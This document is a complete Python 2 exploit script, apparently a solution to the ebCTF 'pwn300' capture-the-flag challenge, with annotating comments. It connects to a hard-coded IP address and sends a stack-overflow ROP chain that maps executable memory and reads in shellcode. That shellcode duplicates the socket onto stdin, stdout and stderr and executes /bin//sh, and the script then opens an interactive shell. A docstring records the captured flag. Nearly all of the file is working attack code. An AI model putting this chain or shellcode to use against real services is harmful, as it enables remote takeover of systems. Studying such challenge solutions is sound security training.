ebCTF pwn300
"""
$python pwn300.py
Interact
cat goproot/FLAG
0h my g0d, I am defeat.
Here, take this:
ebCTF{35a6673b2243c925e02e85dfa916036f}
Did you know: this daemon was named after a dutch security charlatan?
"""
from socket import create_connection
import telnetlib
import time
"""
base : 0xf7617000
mmap : 0xf77020e0
pop2ret = 0x8048d93
pop3ret = 0x804926b
"""
# Everything below runs at import time: this file is a one-shot CTF client
# for the "pwn300" service, not a library. It is Python 2 only (print statement
# at the bottom; str payloads are written to the socket as raw bytes).
sk = create_connection(("54.217.15.93",7070))
# Stage 1: stack overflow + ROP chain, sent as ASCII hex text. Each 8-character
# group is one little-endian 32-bit word -- e.g. "938d0408" is 0x08048d93, the
# pop2ret listed in the note above -- so the service presumably hex-decodes its
# input line (not visible here; confirm against the challenge binary). If the
# whole line is hex-decoded, the 72 'A's become 36 bytes of 0xAA filler.
payload = "A"*72
payload += "938d0408"  # 0x08048d93  pop2ret (note above): pops the next two words, then returns
payload += "41414141"  # first word popped by pop2ret (junk)
payload += "00a00408"  # second word popped: 0x0804a000 -- not in the note above; purpose not determinable here
# mmap(0x01000000, 0x30000, 7, 0x32, -1, 0, 0);
#   7    = PROT_READ|PROT_WRITE|PROT_EXEC
#   0x32 = MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS (x86 Linux values)
payload += "e02070f7"  # 0xf77020e0  mmap (note above)
payload += "908d0408"  # 0x08048d90  return address after mmap; not in the note above. For the chain to
                       # reach 0x080487c0 it has to consume the seven words below (a pop7-style gadget is
                       # the obvious reading -- confirm in the binary)
payload += "00000001"  # addr   0x01000000
payload += "00000300"  # length 0x00030000
payload += "07000000"  # prot   7
payload += "32000000"  # flags  0x32
payload += "ffffffff"  # fd     -1
payload += "00000000"  # offset 0
payload += "00000000"  # seventh word: mmap takes six arguments, so presumably padding eaten by the gadget
# read(4, 0x01000000, 0x29) -- the original comment said a length of 2, but the
# length word below is 0x29 = 41, which equals len(shell) sent as stage 2.
payload += "c0870408"  # 0x080487c0  presumably read (not in the note above)
payload += "00000001"  # return address after read: 0x01000000, i.e. jump into the freshly mapped buffer
payload += "04000000"  # fd  4 (presumably the client connection; confirm)
payload += "00000001"  # buf 0x01000000
payload += "29000000"  # len 0x29
payload += "\r\n"      # line terminator; the service presumably reads one line
sk.send(payload)       # NOTE(review): send() may write only part of the buffer; sendall() is the safe call
time.sleep(1)          # crude wait so stage 1 has executed before stage 2 arrives on the same connection
# Stage 2: 41 bytes of raw (not hex) x86 machine code, exactly the read() length
# above, delivered into the mmap'd buffer and executed from it. The bytes embed
# the string "/bin//sh"; the leading loop looks like a dup2 loop over fd 4 -- confirm by disassembling.
shell = "\x31\xc0\x31\xc9\x31\xdb\xb1\x03\x49\xb0\x3f\xb3\x04\xcd\x80\x75\xf7"
shell += "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
sk.send(shell)
# Hand the already-connected socket to telnetlib for an interactive session
# (the transcript in the module docstring shows what that session produced).
tn = telnetlib.Telnet()
tn.sock = sk           # reuse our socket instead of letting Telnet open its own
print "Interact"
tn.interact()